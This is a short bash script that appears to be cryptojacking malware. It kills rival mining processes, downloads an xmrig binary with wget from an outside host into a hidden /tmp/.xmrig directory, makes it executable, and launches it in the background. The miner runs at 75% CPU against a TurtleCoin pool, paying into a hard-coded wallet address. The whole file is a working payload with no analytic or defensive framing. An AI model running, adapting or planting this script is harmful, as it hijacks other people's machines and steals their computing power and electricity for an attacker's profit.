#!/bin/bash

pkill -9 xmrig
pkill -9 xmrig64
pkill -9 pux
pkill -9 testm
pkill -9 miner
pkill -9 network
pkill -9 networkd
pkill -9 unitex

function download(){
	wget http://printed-bags.net/uploads/xmrig_129 -O /tmp/.xmrig/xmrig
	chmod +x /tmp/.xmrig/xmrig
}

function checkminer(){
	if [ -e /tmp/.xmrig/xmrig ]
	then
		checkpermi
	else
		download
		checkpermi
	fi
}

function checkpermi(){
	if [ -x /tmp/.xmrig/xmrig ]
	then
		/tmp/.xmrig/xmrig -B --max-cpu-usage 75 --donate-level 0 --donate-level 1 -o turtlecoin.herominers.com:10380 -u TRTLv15VBtTS2FMPg8u5SMNYUbSnyNyyf1yZBaVtYMtaKQxhJgHTGNE5iaW9h5KJAEGhMHEdGoraZ9CFk2dxUH9rE6V5xtc7BVh -p x -a argon2/chukwav2 -k 
	else
		chmod +x /tmp/.xmrig/xmrig
		/tmp/.xmrig/xmrig -B --max-cpu-usage 75 --donate-level 0 --donate-level 1 -o turtlecoin.herominers.com:10380 -u TRTLv15VBtTS2FMPg8u5SMNYUbSnyNyyf1yZBaVtYMtaKQxhJgHTGNE5iaW9h5KJAEGhMHEdGoraZ9CFk2dxUH9rE6V5xtc7BVh -p x -a argon2/chukwav2 -k 
	fi
}
if [ -d /tmp/.xmrig/ ]
then
	checkminer
else
	mkdir /tmp/.xmrig/
	checkminer
fi